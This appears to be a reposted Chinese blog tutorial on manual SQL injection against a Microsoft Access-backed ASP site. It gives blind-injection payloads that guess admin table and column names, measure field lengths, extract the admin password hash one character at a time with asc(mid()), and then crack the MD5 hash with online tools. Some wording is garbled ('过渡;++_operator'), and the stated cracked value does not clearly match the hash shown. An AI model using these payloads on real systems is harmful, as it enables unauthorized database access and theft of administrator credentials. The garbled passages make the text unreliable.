博客
关于我
SQL注入access数据库
阅读量:669 次
发布时间:2019-03-16

本文共 914 字,大约阅读时间需要 3 分钟。

SQL注入是一种敏感的安全漏洞,通常通过未正确处理或过渡;++_operator来导致,允许攻击者执行恶意SQL命令。以下是一些手动操作SQL注入的步骤和技巧。

1. 检查注入可能性

首先,观察URL参数是否能够直接注入数据库。例如:

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139

若返回正常响应(如1=1),则表明路径存在注入漏洞。

2. 猜测数据库表名

使用以下SQL语句猜测数据库表名:

and exists (select * from 表名)

替换表名为常见的管理员表名,如admina_adminx_admin等。

  • 如果存在该表名,页面返回正常,说明表名正确。
  • 如果返回错误,继续调整表名或尝试其他名称。

3. 猜测字段名称

逐步猜测字段名称,例如:

and exists (select 字段名 from 表名)

替换字段名为常见管理员字段,如adminpassword等。

  • 确认字段存在后,继续下一步骤。

4. 判断字段长度

测量字段长度,例如:

and (select top 1 len(字段) from 表名) > 0
  • 测试用户名字段长度:and (select top 1 len(admin) from admin) > 0
  • 测试密码字段长度:and (select top 1 len(password) from admin) > 0

这有助于确定字段的具体长度。

5. 分析ASCII码

逐一分析字符的ASCII码:

  • 使用以下SQL语句获取字符ASCII码值:
and (select top 1 asc(mid(字段, 1, 1)) from 表名) > 0
  • 逐步确定每个字符的ASCII码值。
  • 示例:用户_id为admin,密码逐步分析为a48e190fafc257d3

6. 密码解密

将获取到的密码哈希值解密。例如:

bendss

使用在线MD5解密工具仔细核对解密结果。

7. 总结

通过以上步骤,从SQL注入点逐步挖掘数据库结构,获取管理员账号和密码。记住,测试环境至关重要,避免对生产环境造成损害。

转载地址:http://vmnqz.baihongyu.com/

你可能感兴趣的文章
Objective-C实现euclideanDistance欧氏距离算法(附完整源码)
查看>>
Objective-C实现euler method欧拉法算法(附完整源码)
查看>>
Objective-C实现eulerianPath欧拉路径算法(附完整源码)
查看>>
Objective-C实现eval函数功能(附完整源码)
查看>>
Objective-C实现Exceeding words超词(差距是ascii码的距离) 算法(附完整源码)
查看>>
Objective-C实现extended euclidean algorithm扩展欧几里得算法(附完整源码)
查看>>
Objective-C实现Factorial digit sum阶乘数字和算法(附完整源码)
查看>>
Objective-C实现factorial iterative阶乘迭代算法(附完整源码)
查看>>
Objective-C实现factorial recursive阶乘递归算法(附完整源码)
查看>>
Objective-C实现FigurateNumber垛积数算法(附完整源码)
查看>>
Objective-C实现Gale-Shapley盖尔-沙普利算法(附完整源码)
查看>>
Objective-C实现hamiltonianCycle哈密尔顿图算法(附完整源码)
查看>>
Objective-C实现hamming numbers汉明数算法(附完整源码)
查看>>
Objective-C实现hanning 窗(附完整源码)
查看>>
Objective-C实现hanoiTower汉诺塔算法(附完整源码)
查看>>
Objective-C实现hardy ramanujana定理算法(附完整源码)
查看>>
Objective-C实现highest response ratio next高响应比优先调度算法(附完整源码)
查看>>
Objective-C实现hill climbing爬山法用来寻找函数的最大值算法(附完整源码)
查看>>
Objective-C实现hornerMethod霍纳法算法(附完整源码)
查看>>
Objective-C实现Http Post请求(附完整源码)
查看>>